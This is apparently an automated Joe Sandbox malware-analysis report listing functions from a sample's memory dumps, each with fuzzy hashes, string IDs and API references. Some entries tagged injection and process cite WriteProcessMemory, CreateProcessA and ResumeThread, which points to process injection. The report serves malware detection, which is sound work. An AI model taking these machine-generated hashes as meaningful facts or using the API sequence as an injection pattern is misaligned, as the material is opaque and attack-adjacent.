(cq, xrefs: 0B348E02
Hcq, xrefs: 0B348E2E
(&_q, xrefs: 0B348F89
, xrefs: 0B348D54

Memory Dump Source

Source File: 00000004.00000002.1362913994.000000000B340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b340000_file.jbxd

Similarity

API ID:
String ID: $(&_q$(cq$Hcq
API String ID: 0-3333576452
Opcode ID: 39bcfa2af73a806a1a873dc7fb38444ae9e260ff263b533bf4d94e50d718514b
Instruction ID: 0ea4692306c118a7d55b83697ffcca7b0f39b06de1e05c42a3f11bd9ad516a14
Opcode Fuzzy Hash: 39bcfa2af73a806a1a873dc7fb38444ae9e260ff263b533bf4d94e50d718514b
Instruction Fuzzy Hash: FA918F70F002199FDB18DF69C8545AFBBF6EF88710F20852AE415EB254EB35AD45CBA0

Function 077AA6E8 Relevance: 3.0, Strings: 2, Instructions: 550
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hcq, xrefs: 077AAC5F
Hcq, xrefs: 077AABA5

Memory Dump Source

Source File: 00000004.00000002.1361733323.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_77a0000_file.jbxd

Similarity

API ID:
String ID: Hcq$Hcq
API String ID: 0-4088181183
Opcode ID: af5a38187783de3dd90651c7885054ee20f99aa29e5ead53d512e2467062a4b7
Instruction ID: bf36d0ddb3cd36d19a7eb411c93953040904957cc06e70dac4ebd9c1f70580d6
Opcode Fuzzy Hash: af5a38187783de3dd90651c7885054ee20f99aa29e5ead53d512e2467062a4b7
Instruction Fuzzy Hash: 8C229170A002199FEB14DBB9C5547AEBBF2AFC8340F2486ADD409AB395DF349D41CB51

Function 077A0040 Relevance: 1.8, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

LR_q, xrefs: 077A06B5

Memory Dump Source

Source File: 00000004.00000002.1361733323.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_77a0000_file.jbxd

Similarity

API ID:
String ID: LR_q
API String ID: 0-2241839734
Opcode ID: 7c2ebff51df6c9976dc8fd61f69647de91a578e1291431fe82bee40470e29804
Instruction ID: 003727945abe53b67686069db38da87d08a50fa8f18fd1d48637540e481798e8
Opcode Fuzzy Hash: 7c2ebff51df6c9976dc8fd61f69647de91a578e1291431fe82bee40470e29804
Instruction Fuzzy Hash: C8323974B402298FDB58DB28C9547EE76F2AFC8700F1485A8D2099B369DF349D86CF91

Function 077A0D46 Relevance: 1.8, Strings: 1, Instructions: 537COMMON

Download Yara Rule

Strings

4'_q, xrefs: 077A159F

Memory Dump Source

Source File: 00000004.00000002.1361733323.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_77a0000_file.jbxd

Similarity

API ID:
String ID: 4'_q
API String ID: 0-2033115326
Opcode ID: 45929670f80ae7e4736bad02b8a22b93c9539dcb17962b176aa1178d29ca8719
Instruction ID: 7d04c51d680f1386dd24fe22b48cda52ad3bd3b8d6035fc294c3d91cef04dc51
Opcode Fuzzy Hash: 45929670f80ae7e4736bad02b8a22b93c9539dcb17962b176aa1178d29ca8719
Instruction Fuzzy Hash: DF42F574A00229CFDB58DB28C985BE9B3F2FF89700F1541E9D509AB365DA31AD81CF61

Function 0B3F7590 Relevance: 1.7, Strings: 1, Instructions: 431COMMON

Download Yara Rule

Strings

Hcq, xrefs: 0B3F7612

Memory Dump Source

Source File: 00000004.00000002.1363009853.000000000B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b3f0000_file.jbxd

Similarity

API ID:
String ID: Hcq
API String ID: 0-419967981
Opcode ID: 70b1012c739ab3547e3a25d8f9fe09c1ff2743c05b228721846910bbc5dcb6d5
Instruction ID: 2d48635be4c719ca6bc579367dfca1fb05c897d2b2ea7acfe33bfdc708ef8fb0
Opcode Fuzzy Hash: 70b1012c739ab3547e3a25d8f9fe09c1ff2743c05b228721846910bbc5dcb6d5
Instruction Fuzzy Hash: 0CE18C717006519FDB1AEB79C4607AEB7E7AF89700F24446ED2498B390DF35E902CB61

Function 077A3710 Relevance: 1.7, Strings: 1, Instructions: 421COMMON

Download Yara Rule

Strings

, xrefs: 077A5B6E

Memory Dump Source

Source File: 00000004.00000002.1361733323.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_77a0000_file.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4342f50cbeaba36cb54a477e3f90a0f7143bf31aa5ed11c2d30fa00e629c660d
Instruction ID: e9087ef6aeb1b60108b924f38dd44762bd17d835dc8aea65369a5c1b5c7b477a
Opcode Fuzzy Hash: 4342f50cbeaba36cb54a477e3f90a0f7143bf31aa5ed11c2d30fa00e629c660d
Instruction Fuzzy Hash: 6D022D75E00219DFEB14DF64C894B9DB7B6AF99340F10869AD00AB7290EF70AA85CF51

Function 04B9E190 Relevance: .7, Instructions: 651COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0bc9cf57e578900cc9c808698a650e6c53990c8c6ce48fbfde07d31dead75e2
Instruction ID: 70935e48fcf9145535c54ab9b5048cd3573fb09dcee8de789702eec7f3b085e8
Opcode Fuzzy Hash: e0bc9cf57e578900cc9c808698a650e6c53990c8c6ce48fbfde07d31dead75e2
Instruction Fuzzy Hash: 6042A178701600DFDB29EB78C55866D7BE2EF89306B2048BDE5079B3A4DA35EC42CB51

Function 0B34DEB0 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1362913994.000000000B340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b340000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9e3f39d26ba939cacf4607119a3e32387db3a87a5a6cf8cee5c7b986183f4bc
Instruction ID: b214d2dbc09d3cdd7328a32994e2a9316f0a0fe295c81727c490c64935a24c67
Opcode Fuzzy Hash: b9e3f39d26ba939cacf4607119a3e32387db3a87a5a6cf8cee5c7b986183f4bc
Instruction Fuzzy Hash: D9521835900629DFDB25DF65C844AA9B7F1FF49304F2485E9E409AB261EB31EE81CF40

Function 0B3F0040 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1363009853.000000000B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b3f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f06e8a62b421a3964e9083dadb9d65db7724540a5cebc02892022efd141502c
Instruction ID: a0fcfafe3c88eedadb8aece14e089eb01e830e32cccb46a07bfcb5191532def6
Opcode Fuzzy Hash: 0f06e8a62b421a3964e9083dadb9d65db7724540a5cebc02892022efd141502c
Instruction Fuzzy Hash: 15324B3590061ACFDB25DF68C944BD9B7B2FF89304F1485EAE509AB221DB71AA84CF40

Function 0B345E40 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1362913994.000000000B340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b340000_file.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 0dfe537be70a3a3136c78eb9c404081f6a1846644cacdb27758cdbc1474b9c70
Instruction ID: 5836f24ce7005e26a7416271d8a3371856fd577f4bad2c2f0e37c3572eaa93c3
Opcode Fuzzy Hash: 0dfe537be70a3a3136c78eb9c404081f6a1846644cacdb27758cdbc1474b9c70
Instruction Fuzzy Hash: 97F15A30A00209DFDB14DFA9C949BADBBF1FF89704F2581A9E405AB365DB70E945CB81

Function 077AA6C1 Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1361733323.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_77a0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c061bfa5dd520546687f61cbec4c789c5dcdcb0c98d28823f2701ed24257ca4
Instruction ID: 9ff0d3a8f404a0aed531ab4bf790961c19b8145e2aa179870a4ffcedb716973a
Opcode Fuzzy Hash: 3c061bfa5dd520546687f61cbec4c789c5dcdcb0c98d28823f2701ed24257ca4
Instruction Fuzzy Hash: 3BE13CB0E00219DFEB25DFB5C544A9DBBF2AF89304F25866DE405AB261DB30A981CF50

Function 06842728 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1360993619.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6840000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e5dc4e2f6b9b019e4a2615e1feef23a877f300eb5e7c130533e10f006e422be
Instruction ID: ba489247da74118acb67fd256e385a528977f6e5ad826fb3e89a38aea14f5490
Opcode Fuzzy Hash: 0e5dc4e2f6b9b019e4a2615e1feef23a877f300eb5e7c130533e10f006e422be
Instruction Fuzzy Hash: 54C16F30D042188FDB55EF68C89079EBBB2BF88314F14C5A9E909EB255DB30DA85CF91

Function 0B3FA9A6 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1363009853.000000000B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b3f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9436ef80e5577ca4057e623523ad72ecf7f346219d3c7f502b8d5de3e88014ec
Instruction ID: 45b0d6d9dde141b22eddb228791342ff46c637c32d5a0e5a206fea281ec828a7
Opcode Fuzzy Hash: 9436ef80e5577ca4057e623523ad72ecf7f346219d3c7f502b8d5de3e88014ec
Instruction Fuzzy Hash: 39E0C9B494D205DFC7508F44E8546F8B7BCAB4E712F206096D61EA7651D3304984CF41

Function 04B92EF0 Relevance: 2.7, Strings: 2, Instructions: 248
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(cq, xrefs: 04B93E0A
Hcq, xrefs: 04B93EC8

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID: (cq$Hcq
API String ID: 0-4250889185
Opcode ID: 222aee7849d3429a886754c428a9efd9c2f340e81ededeb66836ae1b5b35f186
Instruction ID: ed44f589976909e4c6e0b1850f238fbaec4b97eab722c22b336344202f4b1661
Opcode Fuzzy Hash: 222aee7849d3429a886754c428a9efd9c2f340e81ededeb66836ae1b5b35f186
Instruction Fuzzy Hash: 6981B571B002059FCF14DF68C8956AEBFF2EF88300F1488AAE90597355DB34AD45C7A1

Function 04B93320 Relevance: 2.7, Strings: 2, Instructions: 212
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hcq, xrefs: 04B9344E
Hcq, xrefs: 04B933E8

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID: Hcq$Hcq
API String ID: 0-4088181183
Opcode ID: 63235739c35f366aed101adc70a2b77f438cc73f966c73e90dd16a40a5d8ff65
Instruction ID: ed284b0a815ece45deb6e6002aebb79e8b7d9a67e0a631ad710267ae07f22634
Opcode Fuzzy Hash: 63235739c35f366aed101adc70a2b77f438cc73f966c73e90dd16a40a5d8ff65
Instruction Fuzzy Hash: CD815B71E002189FDF14DFA9C8946EEBBF2FF88310F14856AE409AB355DB349945CBA1

Function 04B9F920 Relevance: 2.7, Strings: 2, Instructions: 177COMMON

Download Yara Rule

Strings

Hcq, xrefs: 04B9FA99
Hcq, xrefs: 04B9FACC

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID: Hcq$Hcq
API String ID: 0-4088181183
Opcode ID: a4886f10c0e0bef3e01f1d85faded23680941fa16bb24a671d14d3c8db4095a8
Instruction ID: 7fa71032f07f9cc4d8a4ed77e47f934fabe3228d1fee32b61a7d928ac3a16820
Opcode Fuzzy Hash: a4886f10c0e0bef3e01f1d85faded23680941fa16bb24a671d14d3c8db4095a8
Instruction Fuzzy Hash: 30519A31F005199FCF109BA9D8446BEBBF2FBC8324F2444A9E416E7344EB35AD528B91

Function 04B93D30 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

(cq, xrefs: 04B93E0A
Hcq, xrefs: 04B93EC8

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID: (cq$Hcq
API String ID: 0-4250889185
Opcode ID: 7737d491fd6d50a8211e051971c9264fe241954406a1fba042bb795b74be7dd3
Instruction ID: aea30b937079073b9291a12de232f9945acb24c7dbdb28d3e2d9b839ae06d25a
Opcode Fuzzy Hash: 7737d491fd6d50a8211e051971c9264fe241954406a1fba042bb795b74be7dd3
Instruction Fuzzy Hash: D741EC31B00105DFCB445FA8C4585BE7FE7EFC8710B1589AAE50A97394DE309D468791

Function 0692CBCC Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0692CE0E

Memory Dump Source

Source File: 00000004.00000002.1361084066.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6920000_file.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 16421a327ad5720c6cc80bdd1e02986a7ab9aac0042294c8c89772e0450a3cb8
Instruction ID: a0ca7e731d8b2ec4cf1b0bd2c0fc56d1eae4cfd1e7de1ba0f576b6b7e6353384
Opcode Fuzzy Hash: 16421a327ad5720c6cc80bdd1e02986a7ab9aac0042294c8c89772e0450a3cb8
Instruction Fuzzy Hash: C4A16C71D0022ACFDFA0DF68C841BEDBBB6BF48310F14856AE849A7644DB749985CF91

Function 0692CBD8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0692CE0E

Memory Dump Source

Source File: 00000004.00000002.1361084066.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6920000_file.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0b962b402a7e5213edef15343602d7d7892716b201bb1f26e7b9d79a904a9e54
Instruction ID: a212aa20c2ce68c5cff887d2393ab78284f811378ba15a2e8df52bdd0d8a4614
Opcode Fuzzy Hash: 0b962b402a7e5213edef15343602d7d7892716b201bb1f26e7b9d79a904a9e54
Instruction Fuzzy Hash: 08916C71D0022ACFDFA0DF68C8417EDBBB6BF48314F14856AD809A7644DB749985CF91

Function 024BAED0 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 024BB126

Memory Dump Source

Source File: 00000004.00000002.1357285592.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_24b0000_file.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 426962b34b43e9ce067124f554b036f2ddbb68358958cb7e498f09a07dc4fb8b
Instruction ID: 317ed1b8eeaefb2ecb3d0749cc78bde569f0d256ab0456782b5546f9ee38afb9
Opcode Fuzzy Hash: 426962b34b43e9ce067124f554b036f2ddbb68358958cb7e498f09a07dc4fb8b
Instruction Fuzzy Hash: 157124B0A00B158FDB25DF29D05479ABBF1FF88304F10892EE48A97B50D775E949CBA1

Function 04ACBDD9 Relevance: 1.7, APIs: 1, Instructions: 170COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000014,?,?,036E412C,0272B630,?,00000000), ref: 04ACBF46

Memory Dump Source

Source File: 00000004.00000002.1359782961.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4ac0000_file.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: b959b07fb35fac893dbc0d1602293b97d5c4b80f8aa555bc67324732ce317efd
Instruction ID: 0ffdbd03c85e38549dbb3aadffb1ee46c831e40a6e482dfdccf79ce34b56b602
Opcode Fuzzy Hash: b959b07fb35fac893dbc0d1602293b97d5c4b80f8aa555bc67324732ce317efd
Instruction Fuzzy Hash: 1F718D74A01208EFCB55DF69E485DAEBBB6AF48714B154099F901AB361DB32E881CF60

Function 0692C370 Relevance: 1.7, APIs: 1, Instructions: 158threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0692C332

Memory Dump Source

Source File: 00000004.00000002.1361084066.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6920000_file.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a8e2addeb0263261b40f664e54fad9d19a7ee5671c58e4c67ca808179ab79bbb
Instruction ID: fe9e25d076532c6666aa85babcb554f54abadd4ed9f04da2ebe1276fe9a8735b
Opcode Fuzzy Hash: a8e2addeb0263261b40f664e54fad9d19a7ee5671c58e4c67ca808179ab79bbb
Instruction Fuzzy Hash: 46613E75E0021ACFDB54DFA9C9806AEFBF2BF89314F248569D418A7319D7309942CFA1

Function 04AC0BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04AC4381

Memory Dump Source

Source File: 00000004.00000002.1359782961.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4ac0000_file.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: b50a870a029fc71bf48d885bde1c8da3f62a59671466964fb17d0def199b6256
Instruction ID: 0862dd58532f6acd966d1ed621737bd79936d19def8f4041f956338b23df3036
Opcode Fuzzy Hash: b50a870a029fc71bf48d885bde1c8da3f62a59671466964fb17d0def199b6256
Instruction Fuzzy Hash: 9C4126B4A003099FDB54CF99C858AAEBBF5FB88314F258459E519AB321D374A841CBA4

Function 024B449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 024B59A9

Memory Dump Source

Source File: 00000004.00000002.1357285592.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_24b0000_file.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 5f04315a8fce96a0842b24f1cd23d19fcc464f6d8e93f3d02b9c4a39a0bbb54a
Instruction ID: e9bbe103c2b479b42586a7e76aa56238b860f9e781ae9ca310b175d3fe5cfe69
Opcode Fuzzy Hash: 5f04315a8fce96a0842b24f1cd23d19fcc464f6d8e93f3d02b9c4a39a0bbb54a
Instruction Fuzzy Hash: 0541C1B0C00719CBDB24DFA9C844BDEBBB5BF89304F60806AD408BB255DB756945CFA0

Function 024B58ED Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 024B59A9

Memory Dump Source

Source File: 00000004.00000002.1357285592.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_24b0000_file.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 184b5170d4542768bde9bc72cad43a151208fd193d0dd47c00479509f6023e82
Instruction ID: a3e3be2ffa5ea2d49764412cadd5a69ac0208f0903aa195880b6e86b49d74028
Opcode Fuzzy Hash: 184b5170d4542768bde9bc72cad43a151208fd193d0dd47c00479509f6023e82
Instruction Fuzzy Hash: C241E2B0C00619CBDB24DFA9C9847CDFBB1BF89304F20806AD408BB255DB75694ACF60

Function 024B5A64 Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1357285592.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_24b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 926bb276aafb0f9417c47536b69da7547beaf8815fd416a544c023dec3b7b3f7
Instruction ID: d39182d9093151c0ee214ba5ffd52b6485b2862e8ad43c90d75cc4ce905cf23c
Opcode Fuzzy Hash: 926bb276aafb0f9417c47536b69da7547beaf8815fd416a544c023dec3b7b3f7
Instruction Fuzzy Hash: 8231BEB1804649CFDF12DFA8C8547DEFBF1AF8A308F54419AC045BB255C779A94ACB20

Function 06843100 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1360993619.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6840000_file.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: b4896c83af7c5cba74007dc17cf73c9568676546fa5263b73204bb066e82409f
Instruction ID: e309767269ee44cf0f8d7f21886b0ff4fc9229cf6fe8793e4ed41f3a6c936be4
Opcode Fuzzy Hash: b4896c83af7c5cba74007dc17cf73c9568676546fa5263b73204bb066e82409f
Instruction Fuzzy Hash: AE318B729003889FCB11DFA9C844AEEBFF4EF09310F14805AFA54AB261C3359955DFA0

Function 077A50B0 Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000003,00000000,00000000,?,?,?,00000000), ref: 077A512E

Memory Dump Source

Source File: 00000004.00000002.1361733323.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_77a0000_file.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: a32d249a4164dabdf16db9796bcf3e5f99e8048c44f364eef04cb5a2a49500c7
Instruction ID: bacfe5ddc1e08ee5ef30fadb70185fbf904b226515be2bad97f1fd09951bb947
Opcode Fuzzy Hash: a32d249a4164dabdf16db9796bcf3e5f99e8048c44f364eef04cb5a2a49500c7
Instruction Fuzzy Hash: 5F21C175B002019BEB14DB69DC10BBA7766EFC4354F048579E5099B354CB70A825CB90

Function 0684790C Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,06848E35,?,?), ref: 06848EE7

Memory Dump Source

Source File: 00000004.00000002.1360993619.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6840000_file.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: e29fddc8034ef7a8758d16dfd71e7f1f30e3188786b71545d90e3fb02945611d
Instruction ID: a991113b51880b81e1caa25af33eb964da2e76ec114c56384242b0f0652bec52
Opcode Fuzzy Hash: e29fddc8034ef7a8758d16dfd71e7f1f30e3188786b71545d90e3fb02945611d
Instruction Fuzzy Hash: D831EEB5D0034D9FDB50DF9AD884AAEFBF5FB48320F54842AE919A7210D774A944CFA0

Function 0692C948 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0692C9E0

Memory Dump Source

Source File: 00000004.00000002.1361084066.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6920000_file.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 801f7341504fc4397d6313421b2ee6eb0244bcdb3601dc4b67b37090d78a0b26
Instruction ID: a889dbd27214fd0602264939633143f33b4dd38cd05feab8168b9054b19592cd
Opcode Fuzzy Hash: 801f7341504fc4397d6313421b2ee6eb0244bcdb3601dc4b67b37090d78a0b26
Instruction Fuzzy Hash: DE2135B6D003599FCB50DFA9C881BDEBBF5FF48314F10842AE959A7240D7789954CBA0

Function 06848E48 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,06848E35,?,?), ref: 06848EE7

Memory Dump Source

Source File: 00000004.00000002.1360993619.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6840000_file.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 14409e78b90177251df05bdeed1b34c13ecf0b7e66fe0c3e830e2bd82f51f780
Instruction ID: 96ea1e72b1543b4412dded7d630532ae1e323637e49d0670a73a61427f58dfff
Opcode Fuzzy Hash: 14409e78b90177251df05bdeed1b34c13ecf0b7e66fe0c3e830e2bd82f51f780
Instruction Fuzzy Hash: EB31E0B5D003499FCB10DF9AD980AEEBBF4BB48310F14842AE919A7210D774A544CFA0

Function 0692C950 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0692C9E0

Memory Dump Source

Source File: 00000004.00000002.1361084066.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6920000_file.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b61197331e67615d962351256a6d5b4cf7326038c32edd66033418165749a0ef
Instruction ID: c0fe6ab2690c3e4d74b8be59436ed4ffd6bc6079e0cab93e7310b634ca36620d
Opcode Fuzzy Hash: b61197331e67615d962351256a6d5b4cf7326038c32edd66033418165749a0ef
Instruction Fuzzy Hash: E12144B5D003599FCB50CFA9C881BEEBBF4FF48310F10842AE959A7240C7789954CBA0

Function 024BCA40 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024BD366,?,?,?,?,?), ref: 024BD427

Memory Dump Source

Source File: 00000004.00000002.1357285592.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_24b0000_file.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 542118a141fb2892058f491565c496a2a3097fa8a82b6caa299d5b835243c41b
Instruction ID: 5ae702b68285a1e14d32407a1ffecaed3dbc85da59ca82f694d6a08fc20603f5
Opcode Fuzzy Hash: 542118a141fb2892058f491565c496a2a3097fa8a82b6caa299d5b835243c41b
Instruction Fuzzy Hash: 7321E5B5D00248DFDB10CF9AD984ADEBBF4EB48310F14805AE918A3350D374A944CFA4

Function 024BD398 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024BD366,?,?,?,?,?), ref: 024BD427

Memory Dump Source

Source File: 00000004.00000002.1357285592.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_24b0000_file.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a0d3fe44ce90802a30fe7e842230c9de0b0f585892987275816d5023d2daed05
